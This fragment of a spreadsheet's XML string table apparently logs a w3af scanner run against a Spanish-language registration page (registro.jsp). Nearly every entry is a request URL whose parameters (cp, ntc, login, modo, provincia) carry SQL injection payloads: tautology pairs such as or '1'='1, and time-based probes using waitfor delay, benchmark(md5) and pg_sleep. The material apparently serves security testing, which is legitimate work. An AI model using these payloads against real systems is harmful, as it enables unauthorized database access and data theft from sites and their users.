    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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39"+or+"39"="39&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=39"+and+"39"="40&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=39'+or+'39'='39&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=39'+and+'39'='40&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=39+or+39=39+&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=39+and+39=40+&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81"+or+"81"="81&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81"+and+"81"="82&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81'+or+'81'='81&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81'+and+'81'='82&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81+or+81=81+&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=81+and+81=82+&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1;waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1);waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1));waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1';waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1');waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1'));waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1+or+benchmark(2500000,md5(1))&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1+or+pg_sleep(5)&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=50&amp;dni=56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w3af@email.com&amp;login=26"+or+"26"="26</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=26"+and+"26"="27</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=26'+or+'26'='26</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=26'+and+'26'='27</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=26+or+26=26+</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=26+and+26=27+</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro"+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro"+and+"1"="2&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro'+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro'+and+'1'='2&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1"+or+pg_sleep(5)+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99"+or+"99"="99&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99"+and+"99"="100&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99'+or+'99'='99&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99'+and+'99'='100&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99+or+99=99+&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=99+and+99=100+&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0"+or+"40"="40&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
